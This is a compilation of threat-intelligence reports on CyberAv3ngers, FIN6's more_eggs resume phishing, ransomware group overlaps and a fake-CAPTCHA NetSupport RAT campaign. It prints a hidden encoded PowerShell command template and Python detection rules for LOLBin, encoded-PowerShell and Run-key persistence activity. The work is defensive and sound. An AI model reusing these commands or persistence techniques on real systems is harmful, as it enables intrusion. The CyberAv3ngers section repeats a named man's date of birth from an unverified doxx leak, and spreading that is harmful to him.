CyberAv3ngers: From Infrastructure Hacks to Propaganda Machines in the Iran-Israel Cyber War

As the conflict between Iran and Israel escalated in early 2025, it quickly expanded beyond missiles and airstrikes into a broader battle for digital and psychological dominance. Among the most visible players in this new front is a group known as CyberAv3ngers. Their operations have included hijacking water systems, defacing programmable logic controllers (PLCs), and ridiculing Israeli cybersecurity efforts across social media platforms like Telegram and Twitter. Yet, their rise wasn’t built solely on technical exploits—it began with fabrications and theatrical messaging. CyberAv3ngers evolved from obscure defacers into sophisticated narrative operators, blending cyber sabotage with psychological operations. As their influence grew, so did suspicions of deeper affiliations—particularly with Iran’s Cyber Command, suggesting that the group may be more than a rogue actor and instead part of a broader state-aligned strategy.

Act I: A Hot War Fuels a Digital One

The ongoing conflict between Iran and Israel has intensified across both physical and digital fronts. In the last two weeks alone, Iran has launched multi-warhead missile attacks targeting major Israeli cities such as Tel Aviv and Haifa. In response, Israel conducted retaliatory airstrikes against Iranian military installations, nuclear sites, and key IRGC-Cyber Electronic Command (IRGC-CEC) facilities in cities like Isfahan and Tehran. Alongside these kinetic exchanges, Iranian cyber operators have reportedly hijacked Israeli CCTV and smart home cameras to evaluate the precision and impact of missile strikes in real time. Concurrently, cyberattack activity has spiked dramatically since early June, affecting sectors ranging from energy and defense to agriculture and municipal infrastructure across Israel and extending into Western targets.

Act II: Who Are CyberAv3ngers?

Before CyberAv3ngers emerged as a recognizable threat actor in 2023, they appeared to be reviving an obscure alias from the past. In 2020, a group calling itself “Cyber Avengers” claimed responsibility for a power outage and railway disruption in Israel, events that Israeli officials attributed to technical faults, not cyberattacks. No malware was identified, no indicators of compromise (IOCs) were released, and the group faded from view. Then, in September 2023, a new Telegram channel @CyberAveng3rs was launched, adopting the old name with a stylized twist and retroactively tying itself to the 2020 claims. The group posted ideological threats, listed infrastructure targets, and positioned itself as a cyber-arm of resistance. Its first major public claim came on October 8, 2023, when it announced it had hacked the Dorad power station, one of Israel’s largest private energy producers, a dramatic move intended to cement its arrival in the cyber threat landscape.

Except they didn’t hack it.

CyberAv3ngers' claim that they hacked Israel’s Dorad private power station on October 8, 2023, was quickly debunked by technical analysis. Investigators from Securelist confirmed that the images shared by the group were not the result of a new intrusion but were recycled from a 2022 data leak by the Iranian APT group Moses Staff. The visuals had been cropped, overlaid with new logos, and presented as fresh evidence, but metadata and compression timestamps matched the original files. There was no supporting technical evidence—no new malware, logs, or IOCs to indicate that CyberAv3ngers had gained real access to Dorad’s infrastructure. The only actual activity was a denial-of-service (DDoS) attack on the Dorad website, which served more as a psychological support act than an operational exploit. This episode marked a clear shift in CyberAv3ngers' strategy: from technical sabotage to theatrical propaganda.

Act III: The Illusion of the Dorad Hack

In reality, CyberAv3ngers did not breach the Dorad power station in October 2023. Instead, they repurposed images from a 2022 leak by the Iranian APT group Moses Staff. These files, though legitimate at the time of their original release, were outdated. CyberAv3ngers cropped the images, added their own defacement slogans, and circulated them as if they were proof of a new, live intrusion. No technical compromise occurred at Dorad, but the impact was psychological. The staged attack triggered a wave of reactions across social media and threat monitoring communities. Telegram lit up with reposts, and news outlets picked up the story. To reinforce the illusion, CyberAv3ngers launched DDoS attacks on Israeli websites and released altered versions of Israeli infrastructure security guidance under mocking titles like “Advice for Victims.” It was a performance—but one calibrated to sow fear and disrupt public trust.

Act IV: When the Hacks Became Real

While some of CyberAv3ngers’ early claims were rooted in propaganda, the group did carry out real and damaging cyberattacks. Between November 2023 and April 2024, at least 29 confirmed intrusions targeting industrial control systems (ICS) and operational technology (OT) in the United States were attributed to the group. Among these incidents were compromises of Unitronics PLCs used in municipal water utilities, including one in Aliquippa, Pennsylvania, where human-machine interfaces (HMIs) were defaced with the message: “You have been hacked, down with Israel.” The group also targeted fuel distribution systems, specifically Orpak and Gasboy terminals, disrupting their functionality. Additional intrusions affected routers, IP cameras, firewalls, and HMIs across various sectors of critical infrastructure. At the center of these campaigns was a custom Linux-based malware tool known as IOCONTROL, which enabled persistent access, remote command execution, and stealthy communication via encrypted MQTT channels. These attacks confirmed that beneath the narrative manipulation, CyberAv3ngers had a genuine operational capability with real-world consequences.

Act V: Iran’s Cyber Doctrine Evolves

CyberAv3ngers represents the latest evolution in Iran’s long-standing tradition of blending cyber operations with ideological messaging. While groups like Moses Staff, APT33, and Charming Kitten have previously combined technical intrusions with media theatrics, CyberAv3ngers has refined the model into a fully realized propaganda apparatus. Their approach is not just to breach systems, but to control the narrative surrounding those breaches—turning each operation into a performance aimed at both foreign audiences and domestic sympathizers. What sets them apart is the deliberate construction of a digital persona that fuses propaganda, defacement, and symbolic domain control into a cohesive identity.

Further supporting this narrative-centric shift, we observed three domains registered within hours of CyberAv3ngers’ September 15, 2023 Telegram launch post—a message that introduced the group’s rebranding and outlined threats to Israeli infrastructure. The domains were:

  • cyberav3ngers.com
  • cyberav3ngers.org
  • cyberav3ngers.net

All three were registered through Namecheap using the registrar service registrar-servers.com, with privacy masking enabled via WithheldForPrivacy. As of this writing, none of the domains host active websites, nor do they resolve to public content. Passive DNS history shows that these domains were connected briefly to placeholder IP addresses, but no C2 or content delivery infrastructure has been deployed—strongly suggesting that their primary function is symbolic rather than operational.

This domain registration pattern aligns tightly with CyberAv3ngers’ pivot to psychological operations. Rather than functioning as delivery vehicles for malware or command-and-control beacons, these domains appear to serve as digital flags staking ideological territory on the internet. Just as their defacements aim to instill fear and assert presence, these unused domains enhance the group’s narrative power, presenting them as structured, intentional, and enduring. By echoing the group's name in global domain registries, CyberAv3ngers reinforces its persona as a persistent ideological combatant—building credibility not just through code, but through semiotic control.

CyberAv3ngers’ propaganda and PSYOPS narrative strategy:

  • Builds on past Iranian hybrid groups like Moses Staff, APT33, and Charming Kitten, known for blending cyberattacks with ideological content.
  • Operates a Telegram channel not just for updates, but as a staged information environment—complete with threats, slogans, and memes.
  • Frequently shares repackaged defacements and screenshots to simulate recent operations.
  • Registers domain names to establish symbolic control and brand presence (e.g., cyberav3ngers.com, cyberav3ngers.org, cyberav3ngers.net).
  • Continues the Iranian model of patriotic hacker narratives, but with diminished separation between state and grassroots actors.
  • Leverages these platforms to mock foreign security services, distribute edited guidance docs, and amplify the psychological effect of their campaigns.

Act VI: Who’s Behind the Mask?

The U.S. government has made no secret of its belief that Iran’s IRGC-Cyber Electronic Command (IRGC-CEC) is behind the escalating cyber campaigns targeting U.S. and Israeli infrastructure. In 2024 and early 2025, the U.S. Treasury and Department of Justice sanctioned six IRGC-CEC operatives, naming them as key players in attacks against critical systems. All six were added to the Rewards for Justice program, with bounties of up to $10 million for information leading to their arrest. Among the most prominent is Mahdi Lashgarian, a senior cyber operations official and likely architect behind multiple OT-focused malware campaigns. While public attribution has yet to confirm a direct link between Homayunfal and the alias Mr. Sul (or Mr. Soul), mounting circumstantial evidence places him squarely in the operational core of the CyberAv3ngers campaign.

Now, he’s also become a target.

Doxxing by @wereddevilsog Israeli patriot hackers

In May 2025, an Israeli patriotic hacker group calling itself WeRedEvilsOG claimed on Telegram that they had successfully breached Lashgarian’s personal and professional accounts. The group released what it described as a “partial dox drop”, including purported email addresses, internal communications, and IRGC-linked credentials. While the authenticity of the data is still under review, the leak marked the first instance of direct retaliatory targeting against a named Iranian cyber commander involved in the ICS/OT threat landscape.

Mahdi (Mehdi) Lashgarian (IRGC-CEC)

Profile: Mahdi Lashgarian

  • Full Name: Mahdi (Mehdi) Lashgarian
  • Date of Birth: June 2, 1989
  • Nationality: Iranian
  • Affiliation: Senior official in the Islamic Revolutionary Guard Corps – Cyber‑Electronic Command (IRGC‑CEC)

Why he’s suspected to be “Mr. Sul”

  • Matches the technical and leadership profile attributed to the IOCONTROL malware operator
  • Named in the same DOJ bounty notice targeting CyberAv3ngers operators
  • His sanction timeline aligns with the rollout of the most destructive CyberAv3ngers campaigns
  • Newly leaked data by WeRedEvilsOG reportedly ties him to multiple IRGC infrastructure assets

The inclusion of Lashgarian in public sanctions, U.S. bounty programs, and now retaliatory hacker operations by pro-Israel actors suggests that the shadow war between Iran and Israel has entered a new phase—one where attribution isn’t just technical, it’s personal.

Final Act: A War of Machines and Messages

CyberAv3ngers has evolved beyond a conventional threat actor into a strategic asset within Iran’s asymmetric warfare toolkit—combining real-world cyberattacks, recycled leaks, and targeted propaganda to amplify psychological impact. Their operations integrate technical capability, such as IOCONTROL malware and MQTT-based command and control, with ideological messaging distributed via Telegram, Twitter, and symbolic domain registrations. Whether or not “Mr. Sul” is truly Mahdi Lashgarian, the persona functions as a force multiplier shaping narratives, intimidating adversaries, and reinforcing the perception of persistent threat. CyberAv3ngers aren't just breaching systems, they're engineering beliefs.


Eggs in a Cloudy Basket: Skeleton Spider’s Trusted Cloud Malware Delivery

FIN6 and Financially Motivated Cybercrime

Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations.

In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment.

This research combines technical insights and practical analysis for both general audiences and cybersecurity professionals. We examine how FIN6 uses trusted cloud services, such as AWS, to host malicious infrastructure, evade detection, and ultimately deploy malware through socially engineered lures.

Phishing with Fake Resumes

FIN6 begins its attack by crafting phishing emails that impersonate job applicants. But their social engineering doesn't start in the inbox. The group has been observed initiating contact via professional job platforms like LinkedIn and Indeed, posing as enthusiastic job seekers and engaging with recruiters before following up with phishing messages. This adds a layer of authenticity and increases the chances of the recruiter trusting the source.

This phishing lure shows a professionally worded message from a fake applicant in which the domain ('bobbyweisman[.]com') appears as plain, non-clickable text with no hyperlink, so that automated link detection has nothing to inspect. This tactic forces the recipient to manually type the URL into their browser.

Phishing lure showing a professionally worded message from a fake applicant

These messages are carefully written and contain no clickable links—an evasion technique that helps them bypass security filters. Instead, recipients are forced to manually type a URL, often obscured with added spaces or underscores (“_”), such as “elizabethabarton. COM”.

Notably, the domains used in these campaigns often follow a pattern where the attacker's domain mimics a real applicant by combining a first and last name (e.g., bobbyweisman[.]com, ryanberardi[.]com). These domains are typically registered anonymously through GoDaddy, adding a layer of obfuscation that complicates threat attribution and takedown efforts. By exploiting GoDaddy’s domain privacy services, FIN6 further shields the true registrant details from public view and takedown teams. Although GoDaddy is a reputable and widely used domain registrar, its built-in privacy features make it easy for threat actors to hide their identities.

Whois records for these domains typically show redacted ownership information and standardized proxy entries, often pointing to GoDaddy’s domain privacy service. Abuse reports can technically be submitted via contact email fields listed in the Whois, commonly abuse@godaddy.com; however, responses and enforcement timelines vary.

It is likely the actors behind these domains use disposable or fraudulent email addresses, anonymous or foreign IP addresses, and prepaid or stolen payment methods to create and maintain these accounts. Combined with the use of resume-themed domain names and impersonation techniques, this registration strategy allows FIN6 to keep their infrastructure alive just long enough to carry out active phishing campaigns while avoiding rapid takedown by security researchers or registrars.

Cloud-Hosted Malware Infrastructure

FIN6 hosts its phishing sites using trusted cloud infrastructure, including AWS. These platforms are appealing to attackers for several reasons:

  • FIN6 has previously been observed leveraging Amazon CloudFront to obscure infrastructure and evade detection. CDN services like CloudFront mask the origin of malicious content, making it harder for defenders to trace and block the true hosting source.
  • Ease of setup using services like EC2 and S3
  • Low cost with free-tier abuse or use of compromised billing accounts
  • Cloud IP ranges that are often implicitly trusted by enterprise network filters
  • Built-in scalability and the ability to rapidly provision disposable infrastructure

FIN6 often sets up landing pages on cloud-hosted domains that resemble personal resume portfolios. These domains are usually mapped to AWS EC2 instances or S3-hosted static sites, making them difficult to distinguish from legitimate personal or business hosting.

These landing sites are built with traffic filtering logic to distinguish between potential victims and unwanted analysis tools. If the visitor doesn't match specific criteria, the site serves only benign content, typically a plain-text version of the resume or an error page.

To evade detection and analysis, FIN6 deploys a combination of environmental fingerprinting and behavioral checks, including:

  • IP reputation and geolocation – Traffic is filtered to allow access only from residential ISP ranges, excluding connections from cloud infrastructure, VPN services, or known threat intelligence networks.
  • Operating system and browser fingerprinting – The site checks for typical Windows browser user-agent strings, such as Mozilla/5.0 (Windows NT 10.0; Win64; x64). Visitors using Linux, macOS, or uncommon browsers are blocked or shown harmless content.
  • CAPTCHA verification techniques – The site presents a CAPTCHA (such as Google reCAPTCHA) that must be completed before allowing access to any downloadable content. This prevents automated analysis tools and headless browsers from easily interacting with the site. In many cases, the CAPTCHA is only triggered when the visitor meets initial filtering conditions, acting as a final gate to ensure human presence before delivering the payload.

These layered filters ensure that the malicious content is only delivered to actual human recruiters browsing from typical home or office setups, while blocking security scanners and automated crawlers.

If the request meets all conditions, the site returns a CAPTCHA and a fake resume interface that eventually offers a ZIP download. 

All of the resume-themed domains observed in this campaign have been confirmed as hosted on AWS infrastructure; the full set is in the IOC file linked at the end of this report.


These sites often display a professional-looking fake resume, complete with a CAPTCHA to verify human access. Additionally, the attackers employ traffic filtering techniques to control who can access the malicious content. Only users appearing to be on residential IP addresses and using common Windows-based browsers are allowed to download the malicious document. If the visitor originates from a known VPN service, cloud infrastructure like AWS, or corporate security scanners, the site instead delivers a harmless plain-text version of the resume. This selective delivery tactic helps the malware infrastructure avoid detection and analysis. If conditions are met, the site delivers a malicious ZIP file to the visitor.

More_eggs Malware Delivery Chain

The malware delivery uses simple techniques wrapped in deceptive visuals:

  • ZIP file contains a disguised .LNK (Windows shortcut) file
  • LNK file executes hidden JavaScript using wscript.exe
  • Payload connects to external resources and downloads the More_eggs backdoor

More_eggs, developed by the "Venom Spider," also known as "Golden Chickens," is a modular JavaScript backdoor offered as malware-as-a-service. It allows for command execution, credential theft, and follow-on payload delivery, often operating in memory to evade detection.

Common TTPs Observed:

  • Initial Access: .zip archive containing .lnk file
  • Execution: Uses LOLBins like ie4uinit.exe, regsvr32.exe, or msxsl.exe
  • Persistence: Registry run keys or scheduled tasks
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<RandomName>
  • C2 Communication: HTTPS with spoofed User-Agent headers
    • Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  • PowerShell Execution:
    • powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <Base64>

How to Defend Against These Attacks

For Recruiters and General Staff:

  • Avoid manually typing in resume links from unknown senders
  • Be cautious of CAPTCHA-protected resume sites
  • Never download ZIP files unless verified by IT

For Security Teams:

  • Monitor for outbound traffic to domains that appear recently re-registered or show signs of ownership change. These domains may have been benign in the past and are now being used for malicious purposes. This reuse can help attackers benefit from existing domain reputation and bypass domain age-based filters.
  • Block execution of .lnk files inside ZIPs from untrusted sources
  • Detect use of LOLBins executing PowerShell or JScript unexpectedly
  • Implement EDR policies for scripting engine abuse (e.g., wscript.exe, msxsl.exe)
  • Watch for persistence indicators in Windows registry and scheduled tasks
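The TTP list above and the security-team recommendations describe the same chain from two sides: a disguised LNK inside the ZIP runs JScript through wscript.exe, LOLBins or hidden, base64-encoded PowerShell follow, and a Run key provides persistence. The following Python is an added example (not DomainTools' code, nor anything recovered from FIN6) that applies those detections to constructed Sysmon-style process-creation records; the field names, paths and sample events are assumptions built for illustration, and the -EncodedCommand decoder handles the UTF-16LE encoding PowerShell actually uses.

```python
"""Detection logic for the More_eggs delivery chain described above.

Scans constructed process-creation records (Sysmon Event ID 1 style) for a
script host run on a .js from the ZIP viewer's staging folder, a LOLBin spawned
by that script host, hidden/encoded PowerShell, and an HKCU Run key write.
Added example; not DomainTools' or the actor's code.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"ie4uinit.exe", "regsvr32.exe", "msxsl.exe"}  # named in the TTP list
SCRIPT_EXT = re.compile(r"\.(?:js|jse|wsf|vbs|vbe|xsl|sct|hta)\b", re.I)
# Explorer's built-in ZIP viewer extracts to %TEMP%\Temp1_<archive>.zip\ when a
# user double-clicks a file (here, the disguised LNK) inside the archive.
ZIP_STAGING = re.compile(r"\\Temp\\Temp1_[^\\]+\.zip\\", re.I)
RUN_KEY = re.compile(r"HKCU:?\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", re.I)
HIDDEN_FLAGS = re.compile(
    r"-(?:WindowStyle\s+Hidden|ExecutionPolicy\s+Bypass|NoProfile|w\s+hidden|ep\s+bypass|nop)\b",
    re.I)
# PowerShell accepts abbreviated switches: -e, -ec and -enc all mean -EncodedCommand.
ENCODED_ARG = re.compile(r"[-/](?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{8,})", re.I)


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None.

    PowerShell expects base64 of a UTF-16LE string; decoding it as UTF-8
    shows NUL-interleaved text, a common analyst mistake.
    """
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(ev: ProcessEvent) -> List[Finding]:
    image, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    findings: List[Finding] = []
    # Stage 1: the LNK inside the ZIP hands a script file to wscript.exe.
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
        where = "from ZIP viewer staging" if ZIP_STAGING.search(cmd) else "from disk"
        findings.append(Finding("script_host_runs_script", f"{image} {where}: {cmd}"))
    # Stage 2: a LOLBin is driven by the script host or handed a script argument.
    if image in LOLBINS and (parent in SCRIPT_HOSTS or SCRIPT_EXT.search(cmd)):
        findings.append(Finding("lolbin_script_execution", f"{image} spawned by {parent}: {cmd}"))
    # Stage 3: hidden, policy-bypassing, base64-encoded PowerShell.
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None and HIDDEN_FLAGS.search(cmd):
            findings.append(Finding("hidden_encoded_powershell", f"decoded: {decoded}"))
        if parent in SCRIPT_HOSTS:
            findings.append(Finding("powershell_from_script_host", f"parent {parent}"))
        # Persistence: Run key referenced in the decoded or the raw command line.
        if RUN_KEY.search(decoded or "") or RUN_KEY.search(cmd):
            findings.append(Finding("run_key_persistence", "HKCU Run key referenced"))
    return findings


def scan(events: List[ProcessEvent]) -> List[Finding]:
    return [f for ev in events for f in analyze(ev)]


def encode_for_powershell(script: str) -> str:
    # Builds an -EncodedCommand value the way PowerShell expects it (UTF-16LE).
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry mirroring the chain on the page; paths and names are invented.
PERSISTENCE_CMD = (r'New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"'
                   r' -Name Updater -Value "wscript.exe C:\Users\hr\AppData\Roaming\u.js"')
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\hr\AppData\Local\Temp\Temp1_Resume.zip\Resume.js"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand "
                 + encode_for_powershell(PERSISTENCE_CMD), r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(r"C:\Windows\System32\msxsl.exe", r"msxsl.exe data.xml stylesheet.xsl",
                 r"C:\Windows\System32\wscript.exe"),
    # Benign control: an administrator running a script file interactively.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -File C:\Scripts\inventory.ps1", r"C:\Windows\explorer.exe"),
]
```

Running `scan(SAMPLE_EVENTS)` yields one finding per malicious stage and none for the benign control; in production the same rules would be fed by an EDR or Sysmon pipeline rather than the inline list.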

The Efficacy of Low-Complexity Phishing Campaigns

FIN6’s Skeleton Spider campaign shows how effective low-complexity phishing campaigns can be when paired with cloud infrastructure and advanced evasion. By using realistic job lures, bypassing scanners, and hiding malware behind CAPTCHA walls, they stay ahead of many detection tools.

Security teams and HR departments alike must stay informed and vigilant. Training, layered defenses, and early detection of unusual traffic or file types are critical to disrupting these types of attacks.

Stay informed. Stay alert. Stay safe.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/Skeleton-Spider-Trusted-Cloud-Malware-Delivery.csv

If the community has any additional input, please let us know.


Mapping Hidden Alliances in Russian-Affiliated Ransomware

Understanding the landscape of cyber threats, particularly Russian-affiliated ransomware, is a complex and evolving challenge. The traditional model of tracking distinct, unified ransomware groups is becoming increasingly difficult. In the "post-Conti era," ransomware has transformed into a marketplace of mutations. It's no longer about centralized operations but rather a fractured ecosystem where allegiances shift and connections are often hidden.

In order to develop a deeper understanding and help others in the community in the process, Jon DiMaggio at Analyst1, Scylla Intel, and the DomainTools Investigations Team dove into a research project that culminated in a detailed infographic called “A Visual and Analytical Map of Russian-affiliated Ransomware Groups.” This work follows previous research DomainTools undertook in tracking ransomware families and provides a visual representation of complex connections in this space.

The goal of this project was not simply attribution or listing individual groups. Instead, we set out to map hidden connections between criminal factions, going beyond just mapping "families" to understand the intricate relationships between them. The core focus was on identifying overlaps in human operators, code fragments, infrastructure, and TTPs (Tactics, Techniques, and Procedures). 

Infographic: Mapping Hidden Alliances in Russian-Affiliated Ransomware

The Creation Process: A "Spider-Out" Investigation

Creating this map required a deep dive into the operational realities of various ransomware actors. Our methodology involved performing a "spider-out" incremental investigation. We began with well-known groups like Conti, LockBit, and Evil Corp, then expanded our research outwards, following the threads of connection.

To gather the necessary information, we drew upon a variety of sources:

  • OSINT (Open-Source Intelligence)
  • Historic infrastructure data
  • Proprietary threat intelligence
  • HUMINT (Human Intelligence) 

It's important to note that the analysis only includes publicly available information; nothing is revealed that could tip off adversaries.

Our analysis of these diverse data points helped isolate valuable signals from the surrounding noise. This included overlapping IP addresses, passive DNS records, shared certificates, web content, and delivery vectors used by different groups. These infrastructure overlaps imply potential resource pooling, bulletproof hosting, or affiliate-level reuse. We also analyzed code and TTP crossovers, such as the overlap between Black Basta and Qakbot or the use of legacy Trickbot infrastructure. The prevalence of shared tools like AnyDesk and Quick Assist also suggested common training, playbooks, or crossovers in operator organizations. And finally, we looked closely at the most important element, the people in these groups.

Visualizing the Overlaps: Human Capital and Operator Drift

Perhaps one of the most significant findings visualized in the infographic is the human overlap and operator drift. Our research uncovered instances of known individual actors migrating across different ransomware ecosystems. For example, sources indicate individuals like “Wazawaka” have been associated with multiple groups including REvil, Babuk, LockBit, Hive, and Conti. Similarly, "Bassterlord" moved from REvil to Avaddon, then to LockBit, and finally to Hive.

This phenomenon highlights a crucial insight: brand allegiance among these operators is weak, and human capital, rather than any specific malware strain, appears to be the primary asset. Operators adapt to market conditions and reorganize in response to takedowns, and trust relationships are critical: these individuals choose to work with people they know regardless of the name of the organization. Indeed, rebranding in this context is a feature, not a bug. The infographic helps to visualize how these individuals move between groups, carrying their expertise and capabilities with them.

Key Takeaways from the Mapping:

The creation of this infographic reinforces several strategic takeaways:

  • Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
  • Group labeling is increasingly obsolete.
  • The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.

This new perspective, visually represented in this infographic, is crucial for understanding how ransomware operations function today. Groups act like modules, specializing and adapting as the marketplace matures. They exhibit a separation of responsibilities, with distinct roles for negotiators, developers, infrastructure managers, and leadership. Sanctions evasion strategies, such as Evil Corp’s repeated rebranding paired with infrastructure reuse, prove that while names may change, capabilities endure.

Understanding these hidden alliances and overlaps is key to developing and maturing more effective disruption strategies. As a community, we need to evolve how we track actors and criminal brands, recognizing that shared infrastructure or website artifacts might serve as more stable "fingerprints" than group names.

The full infographic provides a comprehensive visual guide to these complex relationships. We believe this work offers a new lens through which to view and counter Russian-affiliated ransomware, emphasizing the need to understand the underlying ecosystem and human networks rather than just transient names and tools.

How Threat Actors Exploit Human Trust: A Breakdown of the 'Prove You Are Human' Malware Scheme

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).

Malicious Multi-Stage Downloader PowerShell Scripts Identified

Our team identified malicious multi-stage downloader PowerShell scripts hosted on multiple themed websites, including Gitcodes sites and fake Docusign CAPTCHA verification pages. These sites attempt to deceive users into copying an initial PowerShell script into the Windows Run prompt and executing it. Upon doing so, the script downloads and executes another downloader script, which in turn retrieves and executes additional payloads, eventually installing NetSupport RAT on the infected machine.

Malicious PowerShell Scripts Hosted on Gitcodes

Malicious PowerShell scripts were found hosted on instances of Gitcodes sites for the purpose of downloading second-stage PowerShell scripts. The second stage also functioned as a downloader, making three or more web requests to retrieve and execute a third stage of scripts from other domains, which then retrieved and ran a fourth stage, resulting in NetSupport RAT running on the victim host.

Domain: gitcodes[.]org resolves to a website running a Gitcodes service titled “Gitcodes - #1 paste tool since 2002!”

The Gitcodes page is populated with a malicious PowerShell script that concatenates multiple strings to form a domain. It then initiates a web request using the specified user agent and domain to download and run the returned script.

The script calls out to “http[:]//tradingviewtool[.]com” using the user agent “TradingView.”

The retrieved script from tradingviewtool[.]com subsequently invokes additional web requests to download 3 files from a different domain “tradingviewtoolz[.]com” and also initiates multiple requests to tradingviewtool[.]com. Initially the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a method of checking in with the computer name to record the initial execution of the script. Once the script completes its intended purpose and cleans up its local artifacts, it calls out to the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name likely indicating the host is infected.

As seen in the capture above, this second-stage script performs a series of malicious actions to install a payload and make it persistent, all while trying to hide its activity and deceive the user. The script essentially functions as a downloader, retrieving NetSupport RAT and running it on the system. The three downloaded files include a legitimate 7-Zip executable, which the script uses to unpack “client32.exe”; it then creates a new entry for it under the current user’s Windows Registry “Run” key. This ensures that `client32.exe` starts automatically every time the user logs in, establishing persistence for the malware. Naming the entry “My Support” is an attempt to make it look less suspicious in lists of startup programs.
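A host-side detection for the second-stage chain just described, as an added example that is not DomainTools' code: it walks constructed Sysmon-style events and flags PowerShell spawned from the Run prompt, 7-Zip unpacking client32.exe, and a Run-key value named “My Support” pointing at client32.exe. The event records, field names (mirroring Sysmon's Image, ParentImage, CommandLine, TargetObject, Details) and paths are all constructed for the example.

```python
"""Host-side detection for the NetSupport second-stage behaviour.

Added example, not DomainTools' code. No single signal is conclusive on its
own (explorer.exe also parents PowerShell started from the Start menu), so
the verdict requires at least two distinct signals from the chain.
"""
import re

# Sysmon: EventID 1 = process create, EventID 13 = registry value set
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)

# Constructed sample events; the downloader command line is deliberately omitted.
SAMPLE_EVENTS = [
    (1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": 'powershell -w hidden -c "<stage-1 downloader omitted>"'}),
    (1, {"Image": r"C:\Users\alice\AppData\Roaming\MySupport\7z.exe",
         "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": r"7z.exe x client32.7z -oC:\Users\alice\AppData\Roaming\MySupport -y"}),
    (13, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\My Support",
          "Details": r"C:\Users\alice\AppData\Roaming\MySupport\client32.exe"}),
    (1, {"Image": r"C:\Program Files\Git\usr\bin\bash.exe",   # benign noise
         "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "bash"}),
]


def detect(events):
    """Return (label, evidence) pairs for each matching event, in event order."""
    findings = []
    for event_id, f in events:
        image = f.get("Image", "").lower()
        parent = f.get("ParentImage", "").lower()
        cmd = f.get("CommandLine", "")
        # Win+R / Run prompt launches show explorer.exe as the parent process
        if event_id == 1 and image.endswith("\\powershell.exe") and parent.endswith("\\explorer.exe"):
            findings.append(("powershell_from_run_prompt", cmd))
        # legitimate 7-Zip used to unpack the NetSupport client
        if event_id == 1 and image.endswith("\\7z.exe") and "client32" in cmd.lower():
            findings.append(("7zip_unpacks_client32", cmd))
        # HKCU Run value: either the "My Support" name or a client32.exe target
        if event_id == 13 and RUN_KEY.search(f.get("TargetObject", "")):
            name = f["TargetObject"].rsplit("\\", 1)[-1]
            details = f.get("Details", "")
            if name.lower() == "my support" or details.lower().endswith("client32.exe"):
                findings.append(("run_key_persistence_client32", f"{name} -> {details}"))
    return findings


def verdict(findings):
    """Two or more distinct signals from the chain is treated as a hit."""
    kinds = {label for label, _ in findings}
    if len(kinds) >= 2:
        return "netsupport_chain_suspected"
    return "weak_signal" if kinds else "none"


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for label, evidence in hits:
        print(f"{label}: {evidence}")
    print("verdict:", verdict(hits))
```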

Uncovering the Broader Malware Ecosystem Behind the Campaign

The observed infrastructure was fairly varied, but the combination of registration and website configuration patterns, together with the repeated use of the same malicious payloads, enabled the identification of additional lure sites serving similar malicious downloader scripts.

Registrar:

  • Cloudflare
  • NameCheap
  • NameSilo

NameServer: 

  • cloudflare[.]com
  • luxhost[.]org
